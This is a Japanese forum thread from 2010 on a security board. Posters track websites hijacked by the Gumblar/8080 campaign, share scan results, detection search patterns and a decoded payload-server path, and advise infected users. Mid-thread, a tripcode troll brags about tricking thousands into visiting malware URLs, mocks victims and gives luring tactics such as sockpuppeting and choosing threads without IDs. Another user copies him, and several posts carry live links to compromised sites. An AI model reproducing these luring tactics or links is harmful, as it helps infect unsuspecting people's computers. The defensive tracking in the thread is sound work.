2010/03/20(土) 21:49:39ウイルスバスターさんから感染の警告きた・・・ もしかしてそのサイトウイルスばらまいてる?
0264名無しさん@お腹いっぱい。
2010/03/20(土) 21:58:31感染してますね
0265名無しさん@お腹いっぱい。
2010/03/20(土) 22:05:560266名無しさん@お腹いっぱい。
2010/03/20(土) 23:24:15www●o-kitakagu●jp/
0267名無しさん@お腹いっぱい。
2010/03/21(日) 02:24:01Lynxで問い合わせフォームからつーほーした。
common/js/base.js も ぁぅぁぅぁー
0268名無しさん@お腹いっぱい。
2010/03/21(日) 02:53:42アホは、ウィルスサイトばらまいてるし
バカは、感染してると教えても再改ざんされるし
ここの人達の努力は、偉いよ
0269名無しさん@お腹いっぱい。
2010/03/21(日) 03:23:48スタートアップにsiszyd32.exeとTMD.tmpがいなくてregedit.exeが起動できれば
感染してないってことになりますか?
0270名無しさん@お腹いっぱい。
2010/03/21(日) 04:11:560271名無しさん@お腹いっぱい。
2010/03/21(日) 06:38:36いいえ
ありません
0272名無しさん@お腹いっぱい。
2010/03/21(日) 07:33:23http://blog.avast.com/2010/03/19/would-you-like-an-iframe-sir/
前菜が難読化Iframe、メインが8080本体でデザートが8080のスクリプト
「おいしい」メニューだって…
0273名無しさん@お腹いっぱい。
2010/03/21(日) 10:00:400274コテハン
2010/03/21(日) 10:37:29www●knack●co●jp
ぁぅ・・・
http://www.google.co.jp/search?hl=ja&source=hp&q=%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+%22%3Bdocument.body.appendChild%28%22+-JAVA+-JAVAScript&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
0275コテハン
2010/03/21(日) 11:08:37www●hdta●jp
www●jc-consulting●jp/
閉鎖してもトロイの配布は止めないらしい・・・
www●daini-survey●com/
>誠に申し訳ありません。
>都合により、当ホームページを一時閉鎖させていただきます。
>これまで、当ホームページへアクセスいただき、有難うございました。
<<!-- \(^o^)/オワタ -->
0276263
2010/03/21(日) 12:15:52とりあえず、踏んでしまったので、しばらくオフラインで使用して、その後リカバリーしようかなっと思ってます。
OSが入っていないドライブもフォーマットしないとだめなんですかね?
あと踏んだ時のPCの状態を書いておきます。
ウイルスバスターから警告くる→いつの間にかウイルスが隔離されてる(時間情報からオーキタ家具HPと判断)→総合検索(クッキーしかひっかからず)
→シマンテックさん・マカフィーさんの無料検索サービスでもひっかからず→とりあえずここに報告→現状
環境:Windows7 Ultimate (Updata最新版)
アドビリーダーUPDATAがあったが、言語サービスだったので、おそらく関係なし
FLASHPLAYER:最新版
IE8:初期設定のまま
普通に侵入されました(泣)
0277名無しさん@お腹いっぱい。
2010/03/21(日) 12:26:250278名無しさん@お腹いっぱい。
2010/03/21(日) 12:29:350279名無しさん@お腹いっぱい。
2010/03/21(日) 12:47:42マジレスするとftpパスはウェブサイトをftpで管理してる人以外には関係ない
最低限システムドライブのフォーマットは必要だが
システム以外のドライブにウイルスのコピーが残ってないとは言えない
心配ならすべてのドライブをフォーマットするのが確実
0281名無しさん@お腹いっぱい。
2010/03/21(日) 13:19:460282名無しさん@お腹いっぱい。
2010/03/21(日) 13:44:27http://www●ibs-ishii-sports●co●jp/
全部消されてるのだが。
0283名無しさん@お腹いっぱい。
2010/03/21(日) 13:54:39なんといっても販売本数No1だからね
0284名無しさん@お腹いっぱい。
2010/03/21(日) 13:57:23ウイルスバスターが警告している時点で防いでるんじゃないか
脆弱性の対策もしているようだし感染はしていないだろ
0285名無しさん@お腹いっぱい。
2010/03/21(日) 14:23:52>FLASHPLAYER:最新版
バージョンはちゃんと書こうね。「10.0.45.2」とか。
0286コテハン
2010/03/21(日) 14:50:49posh-e●com/index3●htm
minatomo●jp/
dxenglish●value-net●net
allgolf●web●fc2●com/a21 ←!
www●granship●com/index●html
0287名無しさん@お腹いっぱい。
2010/03/21(日) 19:09:02jumpfine●com/hiesyo1/
www●clca●or●jp/club/ ←再感染
www●slowstylegym●com
0288(VдV) ◆yUyb3Tqn92
2010/03/21(日) 21:05:52あらゆるスレで踏ませてきたぜb
(>w<)b俺GJ!
(VдV)ノシ AIONスレのみんなー♪みてるー♪
0289あんちたった
2010/03/21(日) 21:24:500291(VдV) ◆yUyb3Tqn92
2010/03/21(日) 21:42:42地雷マスターだおヽ(VдV)ノ今日だけで5000人以上に踏ませたお!
0292名無しさん@お腹いっぱい。
2010/03/21(日) 21:49:57素直に感動。
そこまで出来る勇気が欲しい。
ん?快楽殺人と同じような考え?
取り敢えず影ながら応援。
0293(VдV) ◆yUyb3Tqn92
2010/03/21(日) 21:59:34ウィルスURL踏ませるくらいじゃ罪には問われないんだぜ
それは俺がブログでも証明している
ttp://ruhuraro.blog57.fc2.com/blog-entry-161.html
まぁこの状況でURL踏むのは不安って奴は
「ウィルス 踏ませることは犯罪か?」で検索してみろ
http://search.yahoo.co.jp/search?fr=slv1-ff2tbtop&p=%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9%E3%80%80%E8%B8%8F%E3%81%BE%E3%81%9B%E3%82%8B%E3%81%93%E3%81%A8%E3%81%AF%E7%8A%AF%E7%BD%AA%E3%81%8B%EF%BC%9F&ei=UTF-8
0294(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:01:11しかし前にブログでまとめた内容だと我ながらわかり難い内容になってるな
(V`д´V)よし、こりゃ近々また更新すっか!
今度スティッカムとかでウィルス踏ませる実況配信とかしてみよかな
0295名無しさん@お腹いっぱい。
2010/03/21(日) 22:02:40いや踏ませたぐらいで犯罪にならないのは知ってるがwww
ただそれをする行為は快楽殺人と同じなのでは・・・と思っただけ。
俺は踏ませようとするだけで無理。
ブログは拝見させて貰ってる。
何故か惹かれる。
0296(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:07:03まぁPC命な連中からしたら殺人的なのかもな
俺の影響でPC初期化しちまった奴に見つけ出して殺してやると言われたことも多々ある。
(VдV)俺様としてはただのゲーム感覚
踏ませる立場の心理は大体似たようなもんだろ
踏む奴は馬鹿、平和ボケ乙、ざまぁって感じだな
0297名無しさん@お腹いっぱい。
2010/03/21(日) 22:07:060298名無しさん@お腹いっぱい。
2010/03/21(日) 22:11:280299(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:12:050300名無しさん@お腹いっぱい。
2010/03/21(日) 22:13:24それは「殺す」って言った方が悪い。それは殺人予告だな。
それに常時ソフト(常識)付けずに安易に踏む香具師が悪い。
このガンブラーのご時世でさwwwww
俺も踏ませようかな・・・
一応そういうの好きな方。
0301(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:19:59ちゃんと報告しろよ>w<踏ませるのもっと流行れ!
0302(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:21:10/ \
0303< ・、,,,;;,) ◆15oU7IjJp.
2010/03/21(日) 22:25:53どこが狙い目?
0304(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:33:01適当に行き当たりばったりで楽しめばいいさ
ただ過疎過ぎるとこだと言うまでもなく反応がなくて駄目
貼ってすぐに↑ウィルスだから踏むな!
って書かれた場合は次へ移行すればいい
自演で誘導するのもいいし。
そうだ最初はIDのないスレでやってみれば良い('д')
0305名無しさん@お腹いっぱい。
2010/03/21(日) 22:40:41お手本見せてよ。よく分からない
0306名無しさん@お腹いっぱい。
2010/03/21(日) 22:49:31言いだしっぺなのになw
0307名無しさん@お腹いっぱい。
2010/03/21(日) 22:51:19このスレももう終わりだな
0308(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:54:10そのくらいのことも自分で考えられないようじゃただの低脳だぜ
それに残念ながら
手本ならさっき踏ませてきたのがあるからな(VдV)┌
http://pc11.2ch.net/test/read.cgi/net/1269123304/108n-
0309(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:57:06うむ、お前も低脳だな
ウィルスURLが晒されてるスレをこの俺様こと、顔文字が見てるのは至極自然なことだお
( ´,дゝ`)少し考えればわかることでは〜?ボホホホホホwww
0310(VдV) ◆yUyb3Tqn92
2010/03/21(日) 22:59:13俺様がゲーム感覚で行っていることも
常人にとってはとても難しいことだったりするわけか
てことはつまり・・・・
<(V`д´V)>またエッヘン!ってなるお!
/ \
0311名無しさん@お腹いっぱい。
2010/03/21(日) 23:00:12一つのスレだけじゃ分からないよ
もっと詳しく教えてよ
0312(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:03:02俺様に言われたことへ反論できず、仕方なくワンパターンな流れに逃げているのだな
ならこっちも目には目をワンパターンには・・・
<(V`д´V)>エッヘンパターンだお!!!!
/ \
0313名無しさん@お腹いっぱい。
2010/03/21(日) 23:07:03お前煽り方が下手糞杉
この手のコテにそういう煽りは逆効果
余計調子に乗るだけ
0314< ・、,,,;;,) ◆15oU7IjJp.
2010/03/21(日) 23:08:39質問系でやった。
結構楽しいコレwwww
0315(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:11:48<(V`д´V)>な、なにーーーーー俺が調子に乗っているだとおおお?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
0316(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:13:23<(´VдV`)>やってきたスレを貼らないとな?
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
0317名無しさん@お腹いっぱい。
2010/03/21(日) 23:14:56すまんかった。しかし春だからかな・・・・
0318< ・、,,,;;,) ◆15oU7IjJp.
2010/03/21(日) 23:17:37ttp://gimpo.2ch.net/test/read.cgi/body/1261380362/864
ttp://pc11.2ch.net/test/read.cgi/pcqa/1087711030/446
ttp://pc11.2ch.net/test/read.cgi/pcqa/1258223156/632
0319(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:19:23<(´VДV`)>ブワーッハッハッハッハ!!負け犬ザマァアア死ぬがよい!!!
/ \
l調子ll調子ll調子l
l調子ll調子ll調子l
@@@@@@@@
0320名無しさん@お腹いっぱい。
2010/03/21(日) 23:21:280321(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:25:41(VдV)は?
まだ誰も踏んでねーじゃまいか
ただ貼っただけで誰も踏んでないしふぁびょってないではないか
貼っただけでお前は本気で楽しかったと言っているわけじゃあるまいな
( ´,дゝ`)=3 お前もう不合格だお
0322名無しさん@お腹いっぱい。
2010/03/21(日) 23:27:46すまなかった・・・
そういう意味か・・・
分からなかった俺が悪いな。
一人でやるよ。
アドバイス有り難う。
ブログは読み続けるよ・・・
0323(VдV) ◆yUyb3Tqn92
2010/03/21(日) 23:42:50(VдV)
VдV)
дV)
'д')
д')
')
)
三VдV)ノシ
0324(VдV) ◆yUyb3Tqn92
2010/03/22(月) 00:07:10ガンブラー最高だわ!
今回は踏んだ奴にウィルスだとネタ晴らしせずに放置しまくったぞ
いつもならウィルスでしたー>w<駆除ガンバ!
って俺がネタ晴らしするか、誰かしらがウィルスだと踏んでから気づくんだが
ガンブラーは踏んでもそれがウィルスだと気づかない奴ばかりだお>w<どうなることやらw
0325名無しさん@お腹いっぱい。
2010/03/22(月) 00:16:130326名無しさん@お腹いっぱい。
2010/03/22(月) 00:19:44板違い
0327名無しさん@お腹いっぱい。
2010/03/22(月) 03:25:210328名無しさん@お腹いっぱい。
2010/03/22(月) 04:52:060329名無しさん@お腹いっぱい。
2010/03/22(月) 04:53:560330名無しさん@お腹いっぱい。
2010/03/22(月) 04:56:46http://www.i-paradise5.jp/~simple/otona/index.php
0331名無しさん@お腹いっぱい。
2010/03/22(月) 05:54:50/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
0332名無しさん@お腹いっぱい。
2010/03/22(月) 05:59:508080系ウィルス感染済
ちなみにウィルスバスターは対応遅いからバスターだけ信用するのはどうかと思う
対策ソフトがウィルスとまで言われたウィルスセキュリティ0と比べたら遥かにマシだけど
0333名無しさん@お腹いっぱい。
2010/03/22(月) 06:05:28申し訳ない
>>332
特にサイト運営やFTPソフト使ってないんで気にしてないんですが、
OS、ドライブフォーマットしないと駆除できませんかね?
0334名無しさん@お腹いっぱい。
2010/03/22(月) 06:07:07ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270
ttp://www.virustotal.com/jp/analisis/6a3ae6f561b1b96efa19973bf12caa20aea9834c2627f9bb71a33442990c2526-1269205270
0335名無しさん@お腹いっぱい。
2010/03/22(月) 06:16:52>>2-4の2を適用していれば無問題
0336名無しさん@お腹いっぱい。
2010/03/22(月) 06:25:41わざわざすいません。
早速実施します。
0337名無しさん@お腹いっぱい。
2010/03/22(月) 06:48:16いまからじゃ無駄
OS、ドライブフォーマットせい
0338(VдV) ◆yUyb3Tqn92
2010/03/22(月) 12:43:59(VДV)ブウァハハッハハハッハハハハッハッハ!!!!!ザッマァアアア!!!!ヒャーッハー!
考えなしにウィルス踏むだけでも低脳なのに
俺に踏まされたことを俺が居るところで言ってるところがますます低脳だな>w<
そういう悔しそうな書き込みを見てしまうとますます俺様がヽ(VДV)ノ 喜んでしまうではないか!!!!
しかもお前、挙句の果てにドライブフォーマットするしかないとまで言われちゃって・・・笑
(VДV)ザッマァッァアァァアアみろ!死ねっ!!!お前のようなゴミはPCと一緒に焼却されてこいお(>w<)
おっとPCはリサイクルできるか
でもお前はもう焼却されて死ぬしかないべ?(>w<)そのくらい頭に血が上っているのでは〜?W
0339(VдV) ◆yUyb3Tqn92
2010/03/22(月) 12:47:20(*VдV*)まさか俺様にPC壊された低脳が来るとは・・・
・・・思ってたよ!!!!!(>w<)!!!!!
(VдV)今頃、せっかく休日なのに顔真っ赤にしてフォーマット作業してんだろな
0340(VдV) ◆yUyb3Tqn92
2010/03/22(月) 12:49:57買い物行ったり、ゲームやったり、コーヒータイムを満喫したり、するわけだW
(V`д´V)な、わかったろ
正義は勝つということだよね。これが天才顔文字様とウィルスを踏んじゃう低脳どもの差なのだお。
0341(VдV) ◆yUyb3Tqn92
2010/03/22(月) 12:53:04URLまとめてる連中も同罪だな。
むしろ俺様がウィルス踏ませるのは良い事をしているがURLまとめてる奴は悪だぜ。
なぜならここで手に入れたURLを踏ませてる奴だっているわけだからな(>w<)
(VдV)え?どこって?さぁ〜(笑)
そうだ、これ勇気スレにもマルチしとこっと
0342名無しさん@お腹いっぱい。
2010/03/22(月) 13:48:12楽しいか?
よかったなカス
0343名無しさん@お腹いっぱい。
2010/03/22(月) 14:14:42pXXXX-XXXXXXXXhodogaya.kanagawa.ocn.ne.jp
0344名無しさん@お腹いっぱい。
2010/03/22(月) 14:17:18341のIP?OCNだと困るな・・・
0345名無しさん@お腹いっぱい。
2010/03/22(月) 14:48:15串だろそれ。
串は全規制されないかなぁ。
こんな基地外も串全規制すれば来ないんじゃね?
0346343
2010/03/22(月) 15:13:14■network/ISP/OCN逆引きホスト地域割当表
ttp://wiki.tomocha.net/network_ISP_OCN.html
>ipbf Bフレッツ
>神奈川県 hodogaya.kanagawa.ocn.ne.jp
pXXXX-ipbfXXXXhodogaya.kanagawa.ocn.ne.jp
<!-- ここにアフィ --!> とか・・・ワロタwww
0347名無しさん@お腹いっぱい。
2010/03/22(月) 17:41:590348名無しさん@お腹いっぱい。
2010/03/22(月) 17:56:480349名無しさん@お腹いっぱい。
2010/03/22(月) 20:18:040350名無しさん@お腹いっぱい。
2010/03/22(月) 20:22:170351名無しさん@お腹いっぱい。
2010/03/22(月) 21:39:43串使う事自体が頭おかしい
0352名無しさん@お腹いっぱい。
2010/03/22(月) 21:59:02規制に巻き込まれた時にちょっと使うだけ・・・
0353名無しさん@お腹いっぱい。
2010/03/22(月) 22:26:30代行レススレでいいじゃない
もしくは漫喫
0354名無しさん@お腹いっぱい。
2010/03/22(月) 23:19:120355名無しさん@お腹いっぱい。
2010/03/22(月) 23:21:18http://www.jde-net.co.jp/engineering/index.php
http://www.kikuyakikai.com/
0356名無しさん@お腹いっぱい。
2010/03/22(月) 23:33:19/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ〜ン! また直リンしおって!
| _||||||||| |
\ / \_/ /
\____/
0357名無しさん@お腹いっぱい。
2010/03/22(月) 23:43:16/ ̄ ̄ ̄ ̄\
/ \
/\ \ / |
||||||| (・) (・) |
(6-------◯⌒つ | < バカモ〜ン! わしのAAを壊しおって!
| _||||||||| |
\ / \_/ /
\____/
0358名無しさん@お腹いっぱい。
2010/03/22(月) 23:49:07誰かがウイルスに感染するのって面白いし人の不幸はおまんこの味がするしね
じゃんじゃん感染してけばいいとおもうにだ
0359名無しさん@お腹いっぱい。
2010/03/23(火) 03:56:30ttp://ja.wikipedia.org/wiki/%E5%B9%87%E5%8A%A9%E7%8A%AF
マルウェアの作者と手を組んでやってるんじゃなくて
おまいらが陥落サイトのURLを貼って「勝手に手助け」してるだけだから
>共犯独立性説に立った場合には、実行従属性は不要となり、
>幇助行為が行われた時点で犯罪は完成する。
釣ったやつが感染して、情報流出等の被害が出た場合・・・
訴えられたら逮捕されるだろうねぇ。
0360名無しさん@お腹いっぱい。
2010/03/23(火) 06:12:27↑踏んじゃった人必死だなー
いくらふぁびょっても誰も逮捕されないから
結局お前は泣き寝入りするしかないのであーるw
0361名無しさん@お腹いっぱい。
2010/03/23(火) 06:32:29「こんなことで捕まるとは思ってなかった」
0362名無しさん@お腹いっぱい。
2010/03/23(火) 09:26:140363名無しさん@お腹いっぱい。
2010/03/23(火) 10:06:39お前、空しくならないか?
0364名無しさん@お腹いっぱい。
2010/03/23(火) 10:54:20もちろん貰いの貧乏事故で。
0365名無しさん@お腹いっぱい。
2010/03/23(火) 14:47:02>>263ってwindows7のultimateなのに、
DEP切って、applockerも使ってないの?
ultimateいらねぇじゃん
home にしてしまえw
0366名無しさん@お腹いっぱい。
2010/03/23(火) 15:12:28これって皆さんやはりインストールしているのでしょうか・・・?
>>3の(1)〜(3)までは実行してあったのですが もしかしたらこの状態だと覗いただけで感染してしまってたのでしょうか?
0367名無しさん@お腹いっぱい。
2010/03/23(火) 15:45:570368名無しさん@お腹いっぱい。
2010/03/23(火) 18:29:370369名無しさん@お腹いっぱい。
2010/03/23(火) 18:50:33googlでは引っかからないけどaguseではTrojan-Clicker.JS.Agent.mz
0370名無しさん@お腹いっぱい。
2010/03/23(火) 19:03:33>>252
0371名無しさん@お腹いっぱい。
2010/03/23(火) 19:22:47それでも、一年に一回か二回は仕事をする必要があるんじゃないのかなー、と思うのです。
去年は、3月、10月、12月かな?
感染者がゼロからのスタートでご存知の通りの事態です。
次回は、残存感染サイト数、残存感染PC数から
更に鼠算式に拡大するのでしょうか。
ウイルスも差し替えられるのでしょうか。
出来れば、残存感染サイト数、残存感染PC数をゼロに近づけたいのですが
いろいろと限界があるのです。。。
0372名無しさん@お腹いっぱい。
2010/03/23(火) 19:29:50って感じですね
0373名無しさん@お腹いっぱい。
2010/03/23(火) 19:58:47すごい文章だ
0374名無しさん@お腹いっぱい。
2010/03/23(火) 20:16:39所でこれもガンブラーだよな?
eroquis●s1●freexy●net/
0375名無しさん@お腹いっぱい。
2010/03/23(火) 20:20:32お前眼科行ったほういいよ
0376名無しさん@お腹いっぱい。
2010/03/23(火) 20:30:34ttp://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://eroquis.s1.freexy.net/
0377名無しさん@お腹いっぱい。
2010/03/23(火) 22:37:49ソースも確認出来ないチキンなの?
0378名無しさん@お腹いっぱい。
2010/03/23(火) 22:53:360379名無しさん@お腹いっぱい。
2010/03/23(火) 22:57:33>ただいま移転作業中につき閉鎖しています
>近日中にこのページも削除されますので、ご了承下さい
んで>>367
>>377
今は、改竄に気が付いて対応した後でコードはないが
>>347が発見した時にコードは有ったのかも知れない
>>367からもにコードは有ったのは確か
目で見える物の背後にある、目では見えない真実を読む事も大切なのじゃw
0380名無しさん@お腹いっぱい。
2010/03/24(水) 00:56:39「>>367」をいちいち「>>376」と読み替えなきゃならないのもやっぱその類ですか?
0381名無しさん@お腹いっぱい。
2010/03/24(水) 01:45:59っていうか俺そのサイトよく訪れてたんですけど・・・
仮にgumblarに感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事もありえるのでしょうか?
その場合感染しているかどうか調べる方法はないのでしょうか?心配になってきた・・
0382名無しさん@お腹いっぱい。
2010/03/24(水) 07:15:07サイトが改ざんされた=Gumblar系列のウィルスを呼び出すスクリプトが埋め込まれた
とは限らないよ。
サイトの管理人もなにが置いてあったのか把握してないみたいだし
PCキレイにしたのかどうかもブログの文章からは判断できない。
特定するのは難しいんじゃない?
>感染しているサイト訪れてたとしたら、自分がgumblarを伝染する事も
使ってるPCに脆弱性が残ってるなら感染するだろうね
「ガンブラー」「サイト改ざん」めぐる基本のQ&A 〜 何が起きている? 対策は?
ttp://www.so-net.ne.jp/security/news/newstopics_201001.html
0383名無しさん@お腹いっぱい。
2010/03/24(水) 15:38:02むしろ遅すぎたが
0384名無しさん@お腹いっぱい。
2010/03/24(水) 15:58:49http://yutori7.2ch.net/test/read.cgi/liveplus/1269320563/
【ネット】警視庁がガンブラー問題でフランスなどに国際捜査協力を要請 海外5カ国のサーバ悪用
http://tsushima.2ch.net/test/read.cgi/newsplus/1269327240/
0385名無しさん@お腹いっぱい。
2010/03/24(水) 16:20:08常駐ソフト以外にもスパイボットとか入れてruとかのドメイン全部弾いて
Webブラウザ等を仮想化する
こんなもん?
出来ればCドライブ自体仮想化してしまえば何の心配もないんだろうけどな
0386名無しさん@お腹いっぱい。
2010/03/25(木) 00:47:12ガンブラー系ではないかもしれないが、「igqjj.exe」ってのにやられてしまい今駆除中。
ググッても英文のサイトしか無く、情報少。誰か駆除できた方いませんか?
その英文のサイトにあった「Superなんとか」って言うソフトで駆除しているけど、どこを見てもそのソフトしか出てこない。
新種なのか?
で、感染源はどうやら「チュートリアルDVDの断片」らしい。英語で解説している(DL物)物だが、「まあ雰囲気で解るだろう」と
空けたのが間違いでそれに仕掛けてあったのか、乗ってきたのか定かではない。が、そのDL物ファイルを開けただけでは
見られないもので、アドレスやら何やら登録しないと始まらない仕様。
適当に架空の個人情報を入力し「サブミット」。たしかに映像は始まったが15分もしないうちにPCの挙動がおかしくなり
CORE2 が「フリーズ」。初めてフリーズしたところを このマシンでみた。 うかつだった。
情報ありましたら、よろしくお願いします。重ねてスレチ、すみません。
0387名無しさん@お腹いっぱい。
2010/03/25(木) 01:09:04【ウィルス情報質問 総合スレッド★Part47】@セキュリティ
http://pc11.2ch.net/test/read.cgi/sec/1244633881/l50
0388名無しさん@お腹いっぱい。
2010/03/25(木) 01:14:54スレチだと思うなら該当スレ探せよ
セキュ板に辿りつけたならわかるだろ
そもそも後半は何言ってるかわからん
0389名無しさん@お腹いっぱい。
2010/03/25(木) 09:29:09例の暴露ウィルスと似てるなw
0390名無しさん@お腹いっぱい。
2010/03/25(木) 12:24:570391名無しさん@お腹いっぱい。
2010/03/25(木) 16:13:12そうそう
っていうか現時点での確認方法は各アンチウイルスソフトによるスキャンしかないのかな?
検出しない所が多いみたいだけどさ
0392名無しさん@お腹いっぱい。
2010/03/25(木) 19:06:010393名無しさん@お腹いっぱい。
2010/03/25(木) 19:13:510394名無しさん@お腹いっぱい。
2010/03/25(木) 20:31:30http://tsushima.2ch.net/test/read.cgi/news/1269516555/
0396名無しさん@お腹いっぱい。
2010/03/25(木) 21:05:14ちょww
マジで?
0397名無しさん@お腹いっぱい。
2010/03/25(木) 21:51:54株式会社レジナのホスティングが多すぎ
0398名無しさん@お腹いっぱい。
2010/03/25(木) 22:30:58っつーコードが複数サイトでインジェクションされてるってとあるサイトで見たんだが
どういうこったい
0399名無しさん@お腹いっぱい。
2010/03/26(金) 01:04:38xは気がつかない人は一生気がつかないかも
0400名無しさん@お腹いっぱい。
2010/03/26(金) 02:36:330401コテハン
2010/03/26(金) 11:10:57www●net-fukui●jp
www●doomkeikaku●co●jp/
seo●19th●org/
www●commentsexy●com/ ←ハニートラップwww
現在の最新型は
("repl"+"XXXace".substr(Y))
これが含んでるっぽい
0402名無しさん@お腹いっぱい。
2010/03/26(金) 13:22:571番目と3番目の文法ミスってどうしておこるの?
0404名無しさん@お腹いっぱい。
2010/03/26(金) 14:05:52上から順番に挿入部分だけ切り取ったスキャン結果どえ〜す
http://www.virustotal.com/jp/analisis/f7f75291ac95974de042295fddf9d17139acb088e5c7ddc1667a1244734e663c-1269577456
http://www.virustotal.com/jp/analisis/a5a170b4b43ce59dd76fbbef94fdf1a43bb12702f0716fda3aa48858023969d7-1269579080
http://www.virustotal.com/jp/analisis/057c1e463e53505366f4bd867346d2f7670405b447878a03adec8767f43a382a-1269577469
http://www.virustotal.com/jp/analisis/aca202528b5641f31eaae33a58287c4a6ecf791f5310b7266a86e603a8bf1838-1269577474
Avastが4/4
AVGが2/4
McAfeeが3/4
TrendMicro4/4
カスペルはVerの都合でヒューリスティック表記出ず
ノートンはドライブバイダウンロード阻止
いずれも4/4
こんなとこですかね〜
0405404
2010/03/26(金) 14:20:34一応4ファイル入りです
パスnews
0406コテハン
2010/03/26(金) 17:31:06www●sankiblast●co●jp/ ←新型きたー
現在、発掘作業中・・・
0407コテハン
2010/03/26(金) 17:55:05www●coaster-ya●com/
www●soul-wave●jp/MAME/
j-news●net/
discussanctuary●com/main●php ←!
www●daini-survey●com/
www●daini-survey●com/xmlrpc●php ←!
harappa-h●org/
harappa-h●org/AtoZ/modules/popnupblog/rss●php ←!
ががが・・・
0408U.F.O ◆U.F.OnbYNA
2010/03/26(金) 18:20:00これも新種なの・・・か?
jニュースが・・・
0409コテハン
2010/03/26(金) 18:22:47逃げるの早すぎてワロタwww
0410コテハン
2010/03/26(金) 18:33:05「ただいま絶賛更新中」みたい
あとは・・・
http://search.yahoo.co.jp/search?p=%22%3Cscript%3Evar%22+%22new+String%28%29%3B%22+%22new+Date%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript&ei=UTF-8&fr=top_ga1_sa&x=wrt&meta=fl%3D3
検索結果を見てくれ
0411U.F.O ◆U.F.OnbYNA
2010/03/26(金) 18:37:49よく覗いてたあのサイトも感染ったとは・・・
そのタグが新種か・・・
あとphpが多いけどドメイン範囲でphp感染してる?
0412名無しさん@お腹いっぱい。
2010/03/26(金) 18:45:101年も終息に向かわないなんて…
本当にこれの犯人は死刑では済まされないな
一日でも捕まる事を祈るしかないか…
ここまで新種が出たりして
ロシアンルーレット状態のネットなんかやりたくないよ…もう嫌だ
0413名無しさん@お腹いっぱい。
2010/03/26(金) 18:58:560414コテハン
2010/03/26(金) 20:26:02j-news●net/だが・・・
include/external●js
/include/xoops●js
この2つもやられてた。
あと、デコード後のURLは
news-com-au●priceminister●com●timesonline-co-uk●TheSuperPager●ru:
8080
/5d6d●com/5d6d●com/rian●ru/homeway●com●cn/google●com●php
これで良いのかな?
>>411 陥落サイト=感染したPCの中の情報次第。
0415名無しさん@お腹いっぱい。
2010/03/26(金) 20:47:53Avira&MSE使えねー
0416名無しさん@お腹いっぱい。
2010/03/26(金) 21:01:07ってかスペインかどっかで捕まったウィルス作成グループは
どうなったの?
0417名無しさん@お腹いっぱい。
2010/03/26(金) 21:04:430418名無しさん@お腹いっぱい。
2010/03/26(金) 21:16:000419名無しさん@お腹いっぱい。
2010/03/26(金) 22:02:330420名無しさん@お腹いっぱい。
2010/03/26(金) 22:06:03あれは作者じゃなくてそれを買ってるユーザーだったような
0421名無しさん@お腹いっぱい。
2010/03/26(金) 22:09:29そうなんだ。まぁ、ユーザー捕まえるのだけでも
意味あるかもね
0422名無しさん@お腹いっぱい。
2010/03/26(金) 22:26:11ん?
JS/Redirector.KA KA.1 KA.2 KA.3
として検出されてますが?
0423名無しさん@お腹いっぱい。
2010/03/26(金) 22:39:05virustotalでの検出可否は参考程度と思っといた方が良い
でも安心しちゃダメよ
0424名無しさん@お腹いっぱい。
2010/03/26(金) 23:10:13そうなると.ru:8080が通用しなくなるのかな?
4月1日からだって
ロシアの「.ru」ドメインの登録手続きが厳格化へ――サイバー犯罪の防止がねらい
http://www.computerworld.jp/topics/vs/177469.html
0425名無しさん@お腹いっぱい。
2010/03/26(金) 23:16:200426名無しさん@お腹いっぱい。
2010/03/26(金) 23:31:400427名無しさん@お腹いっぱい。
2010/03/26(金) 23:32:300428名無しさん@お腹いっぱい。
2010/03/27(土) 00:09:53なぜラトビアが本家?
0429名無しさん@お腹いっぱい。
2010/03/27(土) 01:03:08http://www.virustotal.com/jp/analisis/6a96fbd33ce7b4e127b82050a7d64987b348b5b5c1451050b9bc5386c601a823-1269619137
結果: 1/42 (2.39%)
Jiangmin:Trojan/JS.Pegel.a
0430名無しさん@お腹いっぱい。
2010/03/27(土) 02:09:440431コテハン
2010/03/27(土) 18:35:26※他スレへの転載は自己責任で行って下さい。
www●okagrate●com/
www●tirashi●jp/
www●e-proactive●com●hk/
relaxsize●com/
■センセイは最新型を絶賛スルー中
http://www.google.co.jp/search?hl=ja&q=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&btnG=%E6%A4%9C%E7%B4%A2&lr=
0432名無しさん@お腹いっぱい。
2010/03/27(土) 19:13:143〜4連発入ってるやつがいるな
どうやったらこんな連発になるんだか
0433名無しさん@お腹いっぱい。
2010/03/27(土) 21:51:35既に2件確認済み
0434名無しさん@お腹いっぱい。
2010/03/27(土) 22:55:52"今のところ"は対策しとけば感染はしない。セキュ板覗くような人は当然ながらやってるだろ
アドレス貼って楽しんでるようなアホは相手にしたら余計に貼るよ
0435名無しさん@お腹いっぱい。
2010/03/27(土) 23:03:25そういう人は痛い目見て学習したほうがいいんじゃないの
ウイルスサイト貼りを肯定はしないけどさ
0436名無しさん@お腹いっぱい。
